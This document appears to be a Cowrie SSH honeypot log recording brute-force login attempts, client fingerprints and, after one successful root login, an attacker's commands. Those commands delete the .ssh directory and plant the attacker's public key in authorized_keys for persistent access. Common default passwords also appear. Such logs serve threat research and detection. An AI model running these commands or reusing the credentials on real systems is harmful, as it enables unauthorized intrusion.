{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:57:37.870452Z","src_ip":"212.227.235.229","session":"e103a7c99d23"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qazxsw2","message":"login attempt [admin/1qazxsw2] failed","sensor":"my-vps","timestamp":"2025-09-09T05:57:38.867203Z","src_ip":"212.227.235.229","session":"e103a7c99d23"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:40.109282Z","src_ip":"212.227.235.229","session":"e103a7c99d23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39604,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cda3e94e5bb","protocol":"ssh","message":"New connection: 212.227.235.229:39604 (1.2.3.4:22) [session: 0cda3e94e5bb]","sensor":"my-vps","timestamp":"2025-09-09T05:57:52.983816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:57:52.985351Z","src_ip":"212.227.235.229","session":"0cda3e94e5bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:57:53.153704Z","src_ip":"212.227.235.229","session":"0cda3e94e5bb"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:57:54.201247Z","src_ip":"212.227.235.229","session":"0cda3e94e5bb"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:55.373827Z","src_ip":"212.227.235.229","session":"0cda3e94e5bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":37643,"dst_ip":"1.2.3.4","dst_port":22,"session":"be236a33f0af","protocol":"ssh","message":"New connection: 213.6.203.226:37643 (1.2.3.4:22) [session: be236a33f0af]","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.273862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.274966Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.341978Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.login.success","username":"root","password":"Ghostuser","message":"login attempt [root/Ghostuser] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.650200Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:58:02.803961Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.804734Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.805777Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:02.874042Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:58:03.116144Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.116909Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.186060Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.186906Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":41266,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fde4365adf5","protocol":"ssh","message":"New connection: 213.6.203.226:41266 (1.2.3.4:22) [session: 9fde4365adf5]","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.254062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.254717Z","src_ip":"213.6.203.226","session":"9fde4365adf5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.322248Z","src_ip":"213.6.203.226","session":"9fde4365adf5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:03.632033Z","src_ip":"213.6.203.226","session":"9fde4365adf5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:04.702599Z","src_ip":"213.6.203.226","session":"9fde4365adf5"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":48491,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e9268d22d9d","protocol":"ssh","message":"New connection: 213.6.203.226:48491 (1.2.3.4:22) [session: 2e9268d22d9d]","sensor":"my-vps","timestamp":"2025-09-09T05:58:04.768023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:04.768821Z","src_ip":"213.6.203.226","session":"2e9268d22d9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:04.836441Z","src_ip":"213.6.203.226","session":"2e9268d22d9d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:58:05.146774Z","src_ip":"213.6.203.226","session":"2e9268d22d9d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:05.215011Z","src_ip":"213.6.203.226","session":"be236a33f0af"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:58:05.216142Z","src_ip":"213.6.203.226","session":"2e9268d22d9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60254,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd6f4c886ed9","protocol":"ssh","message":"New connection: 212.227.235.229:60254 (1.2.3.4:22) [session: fd6f4c886ed9]","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.588270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.589195Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.675094Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.848773Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.849370Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.937030Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T05:58:09.937650Z","src_ip":"212.227.235.229","session":"fd6f4c886ed9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36387,"dst_ip":"1.2.3.4","dst_port":22,"session":"5454b51ba234","protocol":"ssh","message":"New connection: 212.227.235.229:36387 (1.2.3.4:22) [session: 5454b51ba234]","sensor":"my-vps","timestamp":"2025-09-09T05:58:13.262349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:58:13.263260Z","src_ip":"212.227.235.229","session":"5454b51ba234"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:58:13.349776Z","src_ip":"212.227.235.229","session":"5454b51ba234"}
